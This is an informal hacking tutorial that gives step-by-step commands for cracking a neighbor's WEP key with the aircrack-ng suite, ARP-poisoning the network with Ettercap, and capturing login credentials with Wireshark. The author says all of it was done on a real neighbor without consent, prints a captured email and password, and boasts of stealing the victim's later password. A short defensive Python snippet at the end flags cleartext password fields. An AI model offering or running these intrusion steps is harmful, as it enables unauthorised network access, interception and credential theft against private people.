
Hacking Wireless Networks

by data

-Disclaimer-

The sole purpose of this article is so that you may be informed about how your neighbor may be able to take a laptop, crack your WEP/WPA key to your router you think is safe, then reroute all your internet traffic to his computer you think he can't look at, and even watch you browse the internet in real time when you think nobody is watching.

-What I will be Going Over-

In this article, I don't plan on giving you any bullshit. I don't plan on hinting towards how to break into a wifi network, I will show you how to break into a wifi network. I will do it in simple steps, and only break them down if I feel that you will need it or can benefit from knowing it. The subjects I will touch on include the following:

1. Brief Introduction to Backtrack
2. Cracking the WEP Key (we will go over WEP cracking, I may write another one on WPA a bit later)
3. MITM Attack
4. Basic Network Analysis

-Brief Introduction to Backtrack-

Backtrack is something that is essential, in my opinion, to be in any hacker's toolbox. It is a live Linux CD that is compatible with most laptops. (Just for reference sake, I am using my Eee PC with an external DVD-ROM drive to boot it.) All you have to do is go to www.remoteexploit.org and download the ISO that fits what you would like to use it on (CD, DVD, or USB/SD). Once you do that, you will need to stick the CD/DVD/USB/SD into your laptop, and restart. When you restart, you must hit whatever key you need to load the boot options; for most computers it's F8 or F9, for mine, it's the ESC key. Once you boot into it, you will have to go through a few menus; basically all you have to do is keep hitting enter until the KDE loads. When the boot is finished, you should see a screen similar to this:

-Cracking the WEP Key-

Note: For reference, since not all parameters are the same for each laptop, I have put them as variables ($) where you plug in what is necessary for you.

1. Open a new shell prompt:

1. Type airmon-ng to see what interfaces are available. As you can see I have 2 interfaces, wifi0 and ath0, but wifi0 is the parent of ath0, so this will be a bit tricky. Most laptops only have one interface.
2. Type airmon-ng stop ath0 to stop the ath0 interface.
3. Type airmon-ng start wifi0 so it puts ath0 into monitor mode.
4. Type clear to clear the screen, then type ifconfig ath0 down
5. Now we need to change the MAC address; to do this type macchanger --mac 00:11:22:33:44:55 ath0
6. Now we need to turn our interfaces back on by typing airmon-ng start wifi0
7. Now we get down to the meat and bones, we can start scanning for networks by typing in airodump-ng ath0
8. If you already know the ESSID of the network you would like to crack the WEP key for, go right ahead and crack it, but because I am doing this on a neighbor, I took a guess that it was the one with the highest PWR. Which is linksys---- (blocked out for security purposes).
9. Now we are going to single that network out by typing in the following: airodump-ng -c $CHANNEL -w wepcrack --bssid $BSSID ath0
11. Now our goal is to get the #Data field to reach around 10,000 (just to be safe), so we have to provoke the data by first associating ourselves with the network. Do this by typing aireplay-ng -1 0 -a $BSSID -h 00:11:22:33:44:55 -e $ESSID ath0
    I don't think I would need to break this down for you; to do this, I am sure you can just look at what I did for each of the variables and plug in your own.
12. Now that we're associated, we can start sending packets back to the network, therefore increasing the amount in the #Data field. We do this by typing in aireplay-ng -3 -b $BSSID -h 00:11:22:33:44:55 ath0
13. Once you think the #Data has climbed to a decent amount, open a new shell prompt and type the following: aircrack-ng -n 64 -b $BSSID wepcrack-01.cap

Congratulations! We just cracked our first WEP key. Now what I am going to do is restart my laptop and boot into my regular OS and connect to the network now that I have the WEP key.

-MITM Attack-

In order to intercept their packets, we will need to find some way to take all their internet traffic, forward it to our laptop, then to the internet. How do we do this? Yup, a MITM attack. Here is a simple picture to demonstrate:

So now you may be asking, how do I do this!? Ettercap is the answer. If you're doing this on a Windows machine, you're going to have to google it to install it, but if you're on *nix, you can download and install it simply by typing sudo apt-get install ettercap
Once it is done, we can open the GUI for it by typing sudo ettercap -G into the shell.

1. Go to Sniff > Unified Sniffing and then choose your interface; mine, of course, is ath0
2. From there go to Hosts > Scan for Hosts
3. Now we need to see what hosts are up; do this by going to Hosts > Host List
4. Now, since it is common sense that usually the *.*.*.1 IP is the router, we are going to highlight that, and click Add to Target 1, and since I don't know what all the other IPs go to, I will highlight all the other IPs and click Add to Target 2
5. Go to MITM > arp poisoning and press ok, don't check any of the boxes
6. Now go to Start > Sniffer
7. Minimize ettercap

-Basic Network Analysis-

Finally, we can now start analyzing traffic from their network. This does take a lot of patience and luck though, because they have to be using the internet at the exact time that you are connected to their network. What I did was simply left my laptop running for about an hour during the evening.

1. Download wireshark by typing sudo apt-get install wireshark, if you're on Windows, again, google it. You can open it by simply typing sudo wireshark into a shell

2. Go to Capture > Interfaces and choose the interface you would like to use. To choose it, click Start that is next to the interface; you can kind of get an idea of what interface to use because of the amount of packets going in and out of it

NOTE: DO NOT CHOOSE ANY, it won't work

3. Now we just have to sit back and wait till we get a bunch of packets. I left mine running for about an hour and gathered about 35,000 packets. As you can imagine, that is a lot of packets to skim through on a laptop, and will take forever to search for one query, so I have saved the pcap file (file > save) and will analyze it on my desktop machine, which has a bit more capacity to handle things like this quicker
4. Now that we have all these packets, we can start looking for certain filters; to do this press CTRL+F and click the By String bubble
5. Since I would like some passwords, type password into it, and see what we get
6. Success! As you can see below, it found a packet that has the word password in it!
7. Now we must right click the packet highlighted, and go to Follow TCP Stream; you will be prompted with something that looks like this:
8. I'm sure you can't see this because the picture is a bit small, but if you zoom in, you will be able to see Email_Textbox=dex-12%40yahoo.com and Password_Textbox=th4l1fe

-Closing Notes-

I really do hope you've learned a decent amount from this article. If you have any questions at all, just email me at d4ta13@gmail.com. Just a side note, the person I did this on, a neighbor around the corner, has since deleted his myspace account, and made a new one, which I then got the password to a couple of days later.

Thanks,
-data
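The credentials in the followed TCP stream were readable because the login form was posted over plain HTTP. As an added example (not from the original article), this Python checks a request captured in cleartext for password-like form fields and reports only the field names; the host, values and function name are constructed placeholders, and the field names are the ones the article shows.

```python
import re
from urllib.parse import parse_qsl

# Constructed plain-HTTP login request, shaped like the stream the article
# describes. Host and values are placeholders, not real data.
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: social.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 62\r\n"
    b"\r\n"
    b"Email_Textbox=user%40example.com&Password_Textbox=EXAMPLE-ONLY"
)

# Field names that suggest a secret is being submitted.
SENSITIVE = re.compile(r"pass(word|wd)?|pwd|secret|token", re.IGNORECASE)

def cleartext_credential_fields(raw_request):
    """Return (host, path, [field names]) for password-like form fields in a
    request that was readable on the wire; values are never returned."""
    head, _, body = raw_request.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = []
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        fields += [k for k, _ in parse_qsl(body.decode("latin-1"), keep_blank_values=True)]
    if "?" in path:  # credentials in a query string are exposed the same way
        fields += [k for k, _ in parse_qsl(path.split("?", 1)[1], keep_blank_values=True)]
    hits = [k for k in fields if SENSITIVE.search(k)]
    return headers.get("host", ""), path.split("?", 1)[0], hits

if __name__ == "__main__":
    print(cleartext_credential_fields(SAMPLE_REQUEST))
```

Any hit means the login endpoint should be served only over HTTPS, since anyone on the path between client and server can read the form body.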
